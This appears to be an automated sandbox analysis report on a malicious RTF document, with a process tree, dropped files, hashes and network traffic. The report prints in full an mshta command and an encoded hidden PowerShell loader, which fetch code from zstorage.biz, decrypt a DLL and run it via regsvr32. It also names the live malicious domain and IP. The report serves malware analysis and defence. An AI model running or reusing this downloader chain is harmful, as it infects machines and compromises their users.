  • Is malicious
behavior_graph main Behavior Graph ID: 37746 Sample:  5ZFXLxew8B.rtf Startdate:  21/11/2017 Architecture:  WINDOWS Score:  80 2 EQNEDT32.EXE 47 main->2      started     1 WINWORD.EXE 54 19 main->1      started     13402sig Office equation editor starts processes (likely CVE 2017-11882) 6433sig Encrypted powershell cmdline option found 7783sig Installs new ROOT certificates 8753sig Suspicious powershell command line found 5237sig Drops files with a non-matching file extension (content does not match file extension) 13397sig Powershell connects to network 13377sig Powershell drops PE file 6129sig Blacklisted process start detected (Windows program) d1e459656 zstorage.biz 185.82.23.166, 443 DE-FIRSTCOLOwwwfirst-colonetDE Germany d1e450833 zstorage.biz d1e450892 zstorage.biz d1e289823 IkqJfeZNVt.txt, PE32 d1e425557 msxsl.exe, PE32 2->13402sig 3 mshta.exe 18 2->3      started     3->6433sig 3->7783sig 3->8753sig 3->d1e459656 3->d1e450833 7 powershell.exe 12 7 3->7      started     7->5237sig 7->13397sig 7->13377sig 7->d1e450892 7->d1e289823 dropped 9 regsvr32.exe 2 4 7->9      started     9->6129sig 9->d1e425557 dropped 11 msxsl.exe 9->11      started     process1 signatures1 process3 dnsIp3 signatures3 process7 dnsIp7 fileCreated7 signatures7 process9 fileCreated9 signatures9 process11 fileCreated1 fileCreated3

Simulations

Behavior and APIs

TimeTypeDescription
22:21:14API Interceptor114x Sleep call for process: WINWORD.EXE modified from: 60000ms to: 500ms
22:21:15API Interceptor7x Sleep call for process: EQNEDT32.EXE modified from: 60000ms to: 500ms
22:21:16API Interceptor80x Sleep call for process: mshta.exe modified from: 60000ms to: 500ms

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshot

windows-stand

Startup

  • System is w7
  • WINWORD.EXE (PID: 3116 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\5ZFXLxew8B.rtf MD5: 5D798FF0BE2A8970D932568068ACFD9D)
  • EQNEDT32.EXE (PID: 3172 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • mshta.exe (PID: 3196 cmdline: mshta https://zstorage.biz/read.txt & XXXXXX C MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
      • powershell.exe (PID: 3488 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWgBlAHIAbwBzADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4ADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4ASQBWACAAPQAgACQAbgBnAEMAbQBJAHcAWQBbADAALgAuADEANQBdADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEsAZQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAE0AVABZADUAUgBqAEoARwBNAEQAZABGAFEAVQBSAEcAUgBEAFUAegBNAEQASQB3AE4AagBKAEMATQBFAFkAMQBSAGsAVQAxAE0AMABKAEMATgB6AFEAPQAnACkAOwAkAHcANgBxAFoAVwBTAGYAZgAgAD0AIAAkAGoAMQBaAFMASwBWAEUARAAzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApADsAJABnAHEAQQAgAD0AIAAkAHcANgBxAFoAVwBTAGYAZgAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAG4AZwBDAG0ASQB3AFkALAAgADEANgAsACAAJABuAGcAQwBtAEkAdwBZAC4ATABlAG4AZwB0AGgAIAAtACAAMQA2ACkAOwAkAHMAbAAgAD0AKABbAGMAaABhAHIAXQA5ADIAKQA7ACQAZgBmACAAPQAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACAAKwAgACQAcwBsACAAKwAgAC0AagBvAGkAbgAgACgAKAA2ADUALgAuADkAMAApACAAKwAgACgAOQA3AC4ALgAxADIAMgApACAAfAAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEMAbwB1AG4AdAAgADEAMAAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApACAAKwAgACcALgB0AHgAdAAnADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAGYAZgAsACAAJABnAHEAQQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBmACkAIAB7ACQAbQBpACAAPQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAgACsAIAAkAHMAbAA7ACQAZQAyACAAPQAgACcAcgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAJwA7AGkAZgAgACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADQAKQAgAHsAIAAkAG0AaQAgAD0AIAAkAG0AaQAgACsAIAAnAFMAeQBzAHQAZQBtADMAMgAnACAAKwAgACQAcwBsACAAKwAgACQAZQAyADsAfQAgAGUAbABzAGUAIAB7ACAAJABtAGkAIAA9ACAAJABtAGkAIAArACAAJwBTAHkAcwBXAE8AVwA2ADQAJwAgACsAIAAkAHMAbAAgACsAIAAkAGUAMgA7AH0AJAB4ADAAPQAoAFsAYwBoAGEAcgBdADMANAApADsAJABhAHIAZwAxACAAPQAgACcALwBzACAAJwAgACsAIAAkAHgAMAAgACsAIAAkAGYAZgAgACsAIAAkAHgAMAA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAkAG0AaQAgACQAYQByAGcAMQA7AH0A' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • regsvr32.exe (PID: 3576 cmdline: 'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt' MD5: 432BE6CF7311062633459EEF6B242FB5)
          • msxsl.exe (PID: 3904 cmdline: unknown MD5: 3E9F31B4E2CD423C015D34D63047685E)
  • cleanup

Created / dropped Files

C:\Users\HERBBL~1\AppData\Local\Temp\CabBEE5.tmp
File Type:Microsoft Cabinet archive data, 53978 bytes, 1 file
MD5:03F9E1F45C0D5FE8E08AF7449BA1FA2F
SHA1:DA545C3133A914434CCE940BAE78D8AD180A529A
SHA-256:677FFB54BD3CC0E2E66ECCAF2F6E6C8E1050286516E4F2EF984A3A3673CCC311
SHA-512:12B7B857EEF3EE3672A57B64178737FDD560340DE34627E09DCF81B910E502DCF1C4E6D42C4A2D9B47A82D061CE71213A985DB4DFEBA04497DE3C91B6688CF02
Malicious:false
Reputation:low
C:\Users\HERBBL~1\AppData\Local\Temp\TarBEE6.tmp
File Type:data
MD5:4479A52B31B6BDE89384FB63854EC382
SHA1:71386477836E4081BEFB501A266CCC4C984030E0
SHA-256:8C0F5D09CF41E38CF161B6CDD1C3A76CEC845B7C11DB267AB800EDABF1A23FB2
SHA-512:6CB248D315B0A27A88CBA9E73352F0627C5C7D94E9B5C0A934D5A1DD7BCB4239B8070FEDCCE9E7D84B2469D6CFB3BC29DB2A14B65FD9CBE52DBFE093CF6E6F30
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
File Type:Microsoft Cabinet archive data, 53978 bytes, 1 file
MD5:03F9E1F45C0D5FE8E08AF7449BA1FA2F
SHA1:DA545C3133A914434CCE940BAE78D8AD180A529A
SHA-256:677FFB54BD3CC0E2E66ECCAF2F6E6C8E1050286516E4F2EF984A3A3673CCC311
SHA-512:12B7B857EEF3EE3672A57B64178737FDD560340DE34627E09DCF81B910E502DCF1C4E6D42C4A2D9B47A82D061CE71213A985DB4DFEBA04497DE3C91B6688CF02
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
File Type:data
MD5:D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
File Type:data
MD5:8147D73000106E874852F227A858AF6A
SHA1:FBA3B6012576258914D5DD717B643B4C1C16B116
SHA-256:95B3E04F7CFB40619CD6B28229A96387157A09EB5791D9EE52862106CECD5114
SHA-512:D170722E20832D1B6FD45BD70E14DB52E82E3E2799CA64C9901CB337AEDB23464FC5A907C1334E853A1440E351C180302C1B556AF229FA32F8783938B7923FB7
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
File Type:data
MD5:517860262B99FC8314D56B0339281D28
SHA1:BDD9DB586F9CA40F602C0492062DB8C23DCEA89F
SHA-256:02AC0F1A023758EB0CC79AA0422953AADBCA74129E2DDEFC6C7A70C2D0442D23
SHA-512:B0B82091F3FDDF9E8DA9707AE3D1A683B031356A55A3E326A11B575AAB825112CE7610FCB3E97B23842AF957E783012F9024DA5EE4E66617788BC8DAAAFBBB1D
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
File Type:data
MD5:7E14F6E2509F10C521DB151151FC1526
SHA1:0D663DBA8CD886C878242EF7D1463A6F7EFE68D9
SHA-256:AEEB094C17C58DCA23455C39DB9DB8292277B845358A78D5923BCC7B1F935391
SHA-512:46076668788805E0B7C75C562B5677CC37009555343DFAED7BC59620DC43EC94D54F25D207DA05469DCC5E1B0546915C5717853BB1629CF4C15E59B69588857A
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
File Type:data
MD5:C37EE3BDFA4B2A4A130CF2B14CE88E21
SHA1:DA03C4961AB217C32BEFC9656EE60D07DC99688C
SHA-256:040064986D6A927CF44EC2DA7822FCF6E90129C8C17755772CC14B5B1383E706
SHA-512:CA36C2E25FD1B09B3ABFDD12D6F7D0CE9939B99DE33F7CBA20AA9B04CA16B364215DA8A86C53B976AED05A0FD0E5A923A168A6921E43927F09571900CC110151
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
File Type:data
MD5:EE9344A24FA2782463E441573AB73BB1
SHA1:7FD79FAB8DBD9662E56A41B19752DBED6CCD0226
SHA-256:B05421186CDF0C2B47A9C6524CC577ABCD424EE94A3815F399446BB1AA32E455
SHA-512:AFEE4B584B7A7957FAAFB91E617F968C6820789097002E2AF3B78AAC44BD305C13886D7589CCEAFD601B74B8C44297453184CCCF3DB1C9095E1732B57487841A
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\77PTX9DT\read[1].txt
File Type:ASCII text, with very long lines, with no line terminators
MD5:065F69B63DA189E3267922AB7039B83E
SHA1:CFC1F5660D73CFEFE33AF308D9CC0BA1D9862227
SHA-256:4282AEFD49EB7E671D0CA1254FB5536C94EF7206C58F303227ADC0CE6FA0674D
SHA-512:0FF1B0CEFEFD88C6B37967C0F529290517ADC18E32B25B1187ED92F21F531E60CED12A46647220D60066AD8365DC60CAF8B7B297279765B7AF65885F5840536C
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0C4C5AB6-368E-452E-AB7C-1439E5127D20}.tmp
File Type:data
MD5:ABF750A0EB5EE0935E5CCD053AB53285
SHA1:4566B0AEFDF4C317D660545FA3E9A45918E14CFB
SHA-256:F0710AC533828A0F55080AA1979BAD43717CE3D7711675F2728B01E27CE06D91
SHA-512:A77AC5A43981FDAF66C112446647D7A0F1EA4171CDB7D99C9B8736821D200CC78F7E059EE4B76304FBEA2FFBEADED9808A1F7D35B3726E00695BAE41A3E1BB3B
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{89A6FBAF-0B2D-4551-A9E9-8FF6D76194A0}.tmp
File Type:data
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt
File Type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
MD5:25EDE508DCE10342D52B72AAA2F35D3E
SHA1:DF675DC60BFF41562CC67F52AE8BB7EA203A9791
SHA-256:5995821AAF9016ACECAD0E497527660FA7C38CEA8B2A92BCB6F592F6F68A941C
SHA-512:879D0F36B8B33CAD6751BD675F19A463C944ECAEFD73BCB7FBA18B327E344A32F0D8BEF7EEAEB0DDE8D8BBCB46A186BD443028966C31330BC95BE83345BEA058
Malicious:true
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\6B05525E026EF66C.js
File Type:ASCII text, with very long lines, with no line terminators
MD5:690EFEF118574F7CFF610DDDA6AE09D7
SHA1:4E3FDE66A13E8F0DFC0FC003890A446FD5AA2575
SHA-256:A53CEA475983F012D0ABCCFDCD7A6176E685EE47434A0FAE7E3037C5BEA0CF5E
SHA-512:DF80A7FDABC2E96BC5A8C547348AF3824D304B7EC9391A3C8A09C694A854666F383AD32DE209DC3B58FCD890A0C23A3A87893C90532FC5A4F763E28C412A5726
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\CAF9DEB8F.txt
File Type:XML document text (XSL stylesheet)
MD5:72619328D03D69D9463733C2C7F0587B
SHA1:B992BC8CDBC446B7FAF97E8E1D4B31492ADBB6E8
SHA-256:A54F29A819C3A4B6453EB96574678F0E646F154D290DB27BCEC650E5ED1474D3
SHA-512:BF5ED0773EE4914C6A7788EC88224F6657C82B82204F08911F6A5296B3BA080BE0B38DB97C77259D64C0F61BE31EEE033D91ABA90A0FF8B136DE9A4690E38B55
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\D32E4DB3961AD18.txt
File Type:XML document text
MD5:613F129EEE78D2909C2E27E03E822B2E
SHA1:3F171D9533508AC7CAA17F89707C6BF70BA731AD
SHA-256:41CCDE839145A1283018F9AFBC1A401CF4A0BE90ACDEE1075D3E43EE4DDB9EE9
SHA-512:B9AC265CB329CD4EA0A35DF4B0B4208EDD1FAF312DAAE1F0955E578908F427F870C4B5E9A61116173790B48957E50759A929AD0709B7940E402646D6BA9E0330
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\5ZFXLxew8B.LNK
File Type:MS Windows shortcut
MD5:2DED2FC3ECE3F21DF267604549DFD3AE
SHA1:3EF13A6A7082BB317121F867C8FD844B0954E1CD
SHA-256:E38FF9D3EF8EEDADFCDA10055DB5DF0120D2E3DE6CE8F00A32DD7A2026869FFB
SHA-512:BCD9E38324203860BF472968783A6A0E1CA1CD5DAD6C51441C5D70DFDD71DC41C85F2A6959AAB688AFC48BBB724F66F4B01E32AA41939FAC0485BE765C23D649
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:data
MD5:D69CD2FC4C1C0CDADA9935EB317CE2C8
SHA1:28383322371B51297F0146A9F348CDCB63BF438A
SHA-256:0288A8DD53C0BBD4828C49233E6C112642A6C23454FE0C9D93CF59A0C8FE1BB6
SHA-512:72C89B8671F5362A285A87B170B28C19D4BD37A7E01640FA14A3C63FF3E6EA32470DF3082000A53725E1297F197100C40160BD7506606C84CBB5B89D4874550D
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:data
MD5:FF291ADF1F74826EE3AA31EA36ADEC1C
SHA1:9E647BCB57789C91D08C9B02D73ECD048239B5C5
SHA-256:08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
SHA-512:A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PA8JKBEMXPATQIYLTXQW.temp
File Type:data
MD5:1DEBA76CE234511BD19B8817E3CF2344
SHA1:8F7C9C510D2AEA064DF668832789B3C72F306EAF
SHA-256:6257ADD6E8E4FB6BAED9DF392FA5D667E938E6141CA013B660D0F3C47BC3C9B1
SHA-512:D44487A935629CE89D18B6B90203EA65161F9B8C6B3540EDFADC43A496B97F5ACD7759AC677D081444E931EA253FCEA055631C72615617F18CCF9AC226E5F667
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe
File Type:PE32 executable for MS Windows (console) Intel 80386 32-bit
MD5:3E9F31B4E2CD423C015D34D63047685E
SHA1:8B516E7BE14172E49085C4234C9A53C6EB490A45
SHA-256:35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7
SHA-512:CF36D14671D16B0F083FF85907661E045C00DCCE46168F26188E22494EB7DD201614DDB1EA8CB82A87604C579AB4067710744B317EB6FF27C0E1A9C5CD8356C0
Malicious:true
Reputation:low
C:\Users\user\Desktop\~$FXLxew8B.rtf
File Type:data
MD5:FF291ADF1F74826EE3AA31EA36ADEC1C
SHA1:9E647BCB57789C91D08C9B02D73ECD048239B5C5
SHA-256:08B022FE12FDA6C82FEEA4C0B2736E6FF757EA90DFF28CE43E7D44CD5FB4AE36
SHA-512:A4CCFF54304DBB44144FFF7EF0027A3DE88B66CBEE24158162D30BC8ED4E8A4D3476645E1F5B76F86BAADB18EF9867116F900B671F7951B5FCC39BABB319C5A2
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus Detection
zstorage.biz185.82.23.166truetrue

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
185.82.23.166Germany
44066DE-FIRSTCOLOwwwfirst-colonetDEtrue

Static File Info

General

File type:Rich Text Format data, version 1, ANSI
TrID:
  • Rich Text Format (5005/1) 55.56%
  • Rich Text Format (4004/1) 44.44%
File name:5ZFXLxew8B.rtf
File size:8020
MD5:11f71f387e87bbb2b97b6c27f78320e4
SHA1:0beb1e04f2f6bb1246631cd0b5595ae99b103fbe
SHA256:2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507
SHA512:4ff6fc7a43ac67797131fee3d28c9522631349c4d0c32460257ac6829df9e266cbbc632e73f7c7e9d96511dabe8a9d5eda686f98ac73536d14c3466ccae9eaf7
File Content Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033.{\info{\author Admin}{\operator Admin}.{\creatim\yr2017\mo11\dy21\hr1\min5}{\revtim\yr2017\mo11\dy21\hr1\min6}{\version1}{\edmins1}{\nofpages1}{\nofwords0}{\nofchars1}{\*\company }{\nofcharsws1}{\vern4

File Icon

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Nov 21, 2017 22:21:26.860404968 MEZ6326653192.168.2.28.8.8.8
Nov 21, 2017 22:21:27.028328896 MEZ53632668.8.8.8192.168.2.2
Nov 21, 2017 22:21:27.093183041 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:21:27.093205929 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:21:27.093307972 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:21:27.147423029 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:21:27.147437096 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:03.258713961 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:03.258733988 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:03.258742094 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:03.258949041 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:03.356493950 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:03.356724024 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:03.526797056 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:03.526813030 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:03.779476881 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:03.779623032 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:04.026335001 MEZ5111353192.168.2.28.8.8.8
Nov 21, 2017 22:22:04.204513073 MEZ53511138.8.8.8192.168.2.2
Nov 21, 2017 22:22:04.214704037 MEZ6186153192.168.2.28.8.8.8
Nov 21, 2017 22:22:04.353858948 MEZ53618618.8.8.8192.168.2.2
Nov 21, 2017 22:22:04.892246962 MEZ6184353192.168.2.28.8.8.8
Nov 21, 2017 22:22:05.202033043 MEZ53618438.8.8.8192.168.2.2
Nov 21, 2017 22:22:05.213591099 MEZ5999153192.168.2.28.8.8.8
Nov 21, 2017 22:22:05.322488070 MEZ53599918.8.8.8192.168.2.2
Nov 21, 2017 22:22:07.046863079 MEZ5527153192.168.2.28.8.8.8
Nov 21, 2017 22:22:07.417412996 MEZ53552718.8.8.8192.168.2.2
Nov 21, 2017 22:22:07.428297997 MEZ5684253192.168.2.28.8.8.8
Nov 21, 2017 22:22:07.567926884 MEZ53568428.8.8.8192.168.2.2
Nov 21, 2017 22:22:07.941570997 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:07.941605091 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.182784081 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.182802916 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.182811022 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.183054924 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:08.209917068 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.209937096 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.209944963 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.210310936 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:08.221075058 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.221093893 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.221101046 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.221324921 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:08.275650024 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.275669098 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.275688887 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.275902033 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:08.383807898 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.383826017 MEZ44349164185.82.23.166192.168.2.2
Nov 21, 2017 22:22:08.384145021 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:10.226366043 MEZ5344053192.168.2.28.8.8.8
Nov 21, 2017 22:22:10.395776987 MEZ53534408.8.8.8192.168.2.2
Nov 21, 2017 22:22:10.414540052 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:10.414562941 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:10.414654016 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:10.479974031 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:10.479989052 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:10.489058971 MEZ49164443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:10.869244099 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:10.869261980 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:10.869508982 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:10.903955936 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:10.903984070 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.233279943 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.412101030 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.412116051 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.699610949 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.699630976 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.699639082 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.699767113 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.704679012 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.704699993 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.704708099 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.704838991 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.714962006 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.714982033 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.714991093 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.715121984 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.735500097 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.750138998 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.750159025 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.750166893 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.750298977 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.763828039 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.763849020 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.763855934 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.763946056 MEZ49168443192.168.2.2185.82.23.166
Nov 21, 2017 22:22:11.765490055 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.765506983 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.765513897 MEZ44349168185.82.23.166192.168.2.2
Nov 21, 2017 22:22:11.765604973 MEZ49168443192.168.2.2185.82.23.166
